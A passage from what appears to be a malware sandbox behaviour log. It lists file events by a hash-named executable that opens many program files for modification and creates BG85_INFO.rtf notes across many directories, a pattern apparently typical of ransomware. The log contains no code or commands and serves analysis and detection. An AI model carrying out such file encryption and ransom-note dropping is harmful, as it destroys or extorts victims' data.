Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\high-contrast.css c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.nl_zh_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ta\LC_MESSAGES\vlc.mo c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_zh_TW.properties c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\North_Dakota\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.nl_ja_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-applemenu_zh_CN.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Tripoli c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Riyadh88 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Tarawa c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Mozilla Firefox\crashreporter.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Saipan c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\sa-jdi.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Antigua c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\management\jmxremote.access c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\net.properties c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\en_GB\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateComRegisterShell64.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Broken_Hill c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Bissau c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.osgi.compatibility.state.nl_ja_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Regina c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-text_ja.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Argentina\Catamarca c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Mozilla Firefox\omni.ja c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Indiana\Knox c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\1423861258748.profile.gz c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Minsk c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.ja_5.5.0.165303.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\org-openide-util-lookup_zh_CN.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\bs\LC_MESSAGES\vlc.mo c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\gl\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\84.0.4147.89\84.0.4147.89_chrome_installer.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Berlin c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.garbagecollector_1.0.200.v20131115-1210.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\vlm_export.html c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Atikokan c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\AST4ADT c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Cayenne c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-sa_zh_CN.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Boa_Vista c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Indiana\Vevay c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Microsoft Sync Framework\v1.0\Runtime\x64\resources\1033\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\SystemV\EST5EDT c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\bookbig.gif c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-print_zh_CN.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\eBook.api c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\images\cursors\win32_MoveDrop32x32.gif c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Port-au-Prince c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Samara c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ja\LC_MESSAGES\vlc.mo c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Santiago c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Indiana\Vevay c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-masterfs_ja.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\bin\rmiregistry.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\vi\LC_MESSAGES\vlc.mo c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Kabul c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\ij.bat c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\triggerConstraints.exsd c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.ui.nl_ja_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\about.html c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Maputo c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Mozilla Firefox\pingsender.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\en_GB\LC_MESSAGES\vlc.mo c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\HST c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.ds_1.4.200.v20131126-2331.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.forms_3.6.100.v20140422-1825.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.views.nl_ja_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Antarctica\Mawson c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\youtube.luac c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_pt_BR.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\pop3.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\ml.pak c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\he\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx.ui_5.5.0.165303.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.touchpoint.natives.nl_zh_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-charts_zh_CN.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\stream_window.html c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Indiana\Marengo c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\Bermuda c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.rcp.product_5.5.0.165303\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\SystemV\YST9 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Windows Journal\Templates\Memo.jtp c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\ia\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Creston c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk.scheduler.nl_zh_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-api-annotations-common_zh_CN.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Saipan c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\mr\LC_MESSAGES\vlc.mo c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\chrome_200_percent.pak c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\accessibility.properties c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-masterfs_zh_CN.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-profiling_ja.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF\ECLIPSE_.SF c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\javax.servlet.jsp_2.2.0.v201112011158.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.console.nl_zh_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jetty.continuation_8.1.14.v20131031.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\win7TSFrame.png c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Honolulu c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-12 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\META-INF\MANIFEST.MF c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\bn\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\vi\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\bg.pak c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\MET c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\custom.lua c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1258.TXT c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\images\cursors\cursors.properties c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Whitehorse c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\README.txt c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Sofia c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\javacpl.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\css\blafdoc.css c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.felix.gogo.command_0.10.0.v201209301215.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.renderers.swt_0.12.1.v20140903-1023.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Chihuahua c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT+7 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\New_Skins.url c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-8 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Uzhgorod c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.ui.ja_5.5.0.165303.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\fy\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\tr.pak c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-application_zh_CN.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Atlantic\Reykjavik c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ICELAND.TXT c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ug\LC_MESSAGES\vlc.mo c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\UserControl.zip c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\.settings\org.eclipse.equinox.p2.artifact.repository.prefs c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\org-openide-util-lookup.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\gtkHandle.png c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\org-netbeans-modules-profiler_visualvm.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Nome c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can32.clx c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd.otf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\FormatInitialize.mht c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\idlj.exe 